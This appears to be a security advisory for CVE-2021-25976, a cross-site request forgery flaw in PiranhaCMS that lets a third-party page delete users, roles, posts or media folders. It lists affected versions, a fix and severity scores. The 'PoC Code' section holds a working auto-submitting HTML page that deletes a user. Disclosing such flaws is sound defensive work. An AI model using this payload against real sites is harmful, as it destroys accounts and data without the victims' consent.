We found results for “”
CVE-2021-25976
Date: November 16, 2021
Overview
In PiranhaCMS, versions 4.0.0-alpha1 to 9.2.0 are vulnerable to cross-site request forgery (CSRF) when performing various actions supported by the management system, such as deleting a user, deleting a role, editing a post, deleting a media folder etc., when an ID is known.Details
PiranhaCMS is vulnerable to cross-site request forgery (CSRF) when performing various actions supported by the management system, such as deleting a user, deleting a role, editing a post, deleting a media folder etc., when an ID is known.PoC Details
Host the below HTML page on a different web server.When a user accesses the malicious HTML page, a request to delete the user is issued.
Once the response is received for the request, we can see that the user was successfully deleted.
PoC Code
<html>
<body>
<form action="http://piranhacms.com:5000/manager/user/delete/99b29f16-0bfa-477b-9d5f-b34efbbf2b8a">
<input type="submit" value="Submit request" />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
Affected Environments
Vulnerable GitHub Versions: v4.0.0-alpha1 to v9.2; Vulnerable Nuget Versions: 4.0.0-alpha1 to 9.2.0Remediation
According to the HTTP specifications, GET requests should be idempotent (non state changing).When performing actions such as deleting users, use a different HTTP method, such as DELETE.
Prevention
Update to Piranha.Manager version 10.0.0Language: C#
Good to know:
Base Score: |
|
---|---|
Attack Vector (AV): | Network |
Attack Complexity (AC): | Low |
Privileges Required (PR): | None |
User Interaction (UI): | Required |
Scope (S): | Unchanged |
Confidentiality (C): | None |
Integrity (I): | High |
Availability (A): | High |
Base Score: |
|
---|---|
Access Vector (AV): | Network |
Access Complexity (AC): | High |
Authentication (AU): | None |
Confidentiality (C): | None |
Integrity (I): | Partial |
Availability (A): | Partial |
Additional information: |